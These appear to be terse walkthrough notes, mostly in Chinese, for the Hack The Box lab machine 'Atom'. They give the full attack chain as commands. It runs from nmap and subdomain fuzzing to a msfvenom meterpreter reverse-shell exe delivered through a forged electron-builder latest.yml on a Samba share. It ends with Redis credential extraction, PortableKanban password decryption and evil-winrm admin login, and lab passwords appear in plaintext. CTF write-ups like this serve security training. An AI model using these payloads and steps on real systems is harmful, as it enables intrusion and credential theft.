nmap -sC -sV -Pn 10.129.51.40 > nmap.txt
nmap -p- 10.129.51.40 -T5  > nmapall.txt

gobuster dir  -u http://atom.htb/ -w /usr/share/dirb/wordlists/common.txt -x txt,php > gobuster.txt
gobuster dir -k -u https://atom.htb/ -w /usr/share/dirb/wordlists/common.txt -x txt,php > gobusterhttps.txt

/opt/ffuf/ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://atom.htb/ -H 'Host: FUZZ.atom.htb' -fs 20750



MrR3boot@atom.htb

1.nmap掃描出80端口及445 samba服務
2.在samba服務裡面可以找到UAT_Testing_Procedeures.pdf
4.在pdf內容查看到electron-builder
5.根據electron-builder上網找到exploit漏洞
https://blog.doyensec.com/2020/02/24/electron-updater-update-signature-bypass.html
6.生成reverse shell exe檔案
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.45 LPORT=4444 -f exe  > "break'shell.exe"
7.生成sha512 hash更改latest.yml
shasum -a 512 "break'shell.exe" | cut -d " " -f1 | xxd -r -p | base64
8.上傳latest.yml到smaba裡面的client3,取得reverse shell
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
9.在C:\Program Files\Redis\發現redis的config檔案
10.裡面可以找到redis的密碼
11.透過redis找到administrator密碼 redis-cli -h atom.htb -a kidvscat_yes_kidvscat
atom.htb:6379> get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0
"{\"Id\":\"e8e29158d70d44b1a1ba4949d52790a0\",\"Name\":\"Administrator\",\"Initials\":\"\",\"Email\":\"\",\"EncryptedPassword\":\"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi\",\"Role\":\"Admin\",\"Inactive\":false,\"TimeStamp\":637530169606440253}"
12.查看download裡面有PortableKanban服務,找到
https://www.exploit-db.com/exploits/49409
12.解密出administrator密碼後,使用evil-winrm登入
evil-winrm -u 'Administrator' -p  'kidvscat_admin_@123' -i atom.htb



Username:              ATOM\jason
Password:              kidvscat_electron_@123
Target:                ATOM\jason
PersistenceType:       Enterprise
LastWriteTime:         3/31/2021 2:53:49 AM




